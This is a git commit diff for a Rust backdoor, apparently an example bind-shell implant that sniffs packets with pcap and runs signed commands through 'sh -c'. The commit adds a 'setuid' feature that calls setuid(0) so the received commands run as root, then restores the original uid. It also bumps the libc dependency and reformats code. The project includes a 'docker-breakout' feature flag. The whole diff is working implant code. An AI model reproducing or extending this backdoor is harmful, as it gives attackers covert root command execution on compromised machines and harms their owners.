feat: added setuid capabilities

2023-08-23 22:40:21 -04:00 · 2023-08-23 22:40:21 -04:00 · 180b29531a
commit 180b29531a
parent 1517ca6f1c
4 changed files with 37 additions and 17 deletions
--- a/Cargo.lock
+++ b/Cargo.lock
@ -170,6 +170,7 @@ dependencies = [
 "cc",
 "ed25519-dalek",
 "ex-bind-shell-key-generator",
+ "libc",
 "log",
 "pcap-sys",
 "simple_logger",
@ -356,9 +357,9 @@ checksum = "e2abad23fbc42b3700f2f279844dc832adb2b2eb069b2df918f455c4e18cc646"

 [[package]]
 name = "libc"
-version = "0.2.142"
+version = "0.2.147"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "6a987beff54b60ffa6d51982e1aa1146bc42f19bd26be28b0586f252fccf5317"
+checksum = "b4668fb0ea861c1df094127ac5f1da3409a82116a4ba74fca2e58ef927159bb3"

 [[package]]
 name = "log"
--- a/examples/bind-shell/backdoor/Cargo.toml
+++ b/examples/bind-shell/backdoor/Cargo.toml
@ -14,6 +14,7 @@ tokio-stream = "0.1.14"
 ed25519-dalek = "1.0.1"
 log = "0.4.17"
 simple_logger = "4.1.0"
+libc = { version = "0.2.147", optional = true }

 [build-dependencies]
 cc = "1.0"
@ -21,3 +22,4 @@ cc = "1.0"
 [features]
 docker-breakout = []
 no-exit = []
+setuid = ["libc"]
--- a/examples/bind-shell/backdoor/src/main.rs
+++ b/examples/bind-shell/backdoor/src/main.rs
@ -35,7 +35,11 @@ async fn handled_main() -> anyhow::Result<()> {

    log::info!("Pubkey is good");

-    let port = std::env::args().skip(1).next().and_then(|a| a.parse::<u16>().ok()).unwrap_or(54248);
+    let port = std::env::args()
+        .skip(1)
+        .next()
+        .and_then(|a| a.parse::<u16>().ok())
+        .unwrap_or(54248);

    #[cfg(feature = "docker-breakout")]
    unsafe {
@ -105,8 +109,9 @@ async fn handled_main() -> anyhow::Result<()> {
                            pubkey_clone,
                            pkt,
                            packet_sender_clone,
-                            exit_sender_clone
-                        ).await
+                            exit_sender_clone,
+                        )
+                        .await
                        {
                            log::warn!("Error handling packet: {e}");
                        }
@ -129,7 +134,7 @@ async fn handle_command(
    pubkey: Arc<PublicKey>,
    eth: EthernetPacket,
    send_response: mpsc::Sender<EthernetPacket>,
-    send_exit: mpsc::Sender<()>
+    send_exit: mpsc::Sender<()>,
 ) -> anyhow::Result<()> {
    use pcap_sys::packets::*;
    let eth_pkt = eth.pkt();
@ -195,6 +200,13 @@ async fn handle_command(
        _ => {}
    }

+    #[cfg(feature = "setuid")]
+    let current_id = unsafe {
+        let id = libc::getuid();
+        libc::setuid(0);
+        id
+    };
+
    let Ok(mut child) = (process::Command::new("sh")
        .arg("-c")
        .arg(cmd)
@ -212,11 +224,11 @@ async fn handle_command(
    {
        let stdout = match &mut child.stdout {
            Some(ref mut stdout) => stdout,
-            None => bail!("could not get child process stdout")
+            None => bail!("could not get child process stdout"),
        };
        let stderr = match &mut child.stderr {
            Some(ref mut stderr) => stderr,
-            None => bail!("could not get child process stderr")
+            None => bail!("could not get child process stderr"),
        };

        enum Output {
@ -245,9 +257,9 @@ async fn handle_command(
            let fullmsg = &[
                match out_type {
                    Output::Out => &[1],
-                    Output::Err => &[2]
+                    Output::Err => &[2],
                },
-                msg
+                msg,
            ]
            .concat();

@ -279,6 +291,11 @@ async fn handle_command(
        .try_into()
        .unwrap();

+    #[cfg(feature = "setuid")]
+    if current_id != 0 {
+        unsafe { libc::setuid(current_id) };
+    }
+
    let done_udp_packet = UDPPacket::construct(54248, source_port, *&[0u8, exit_code]);
    let done_ip_packet = IPv4Packet::construct(
        ip_pkt.dest_ip(),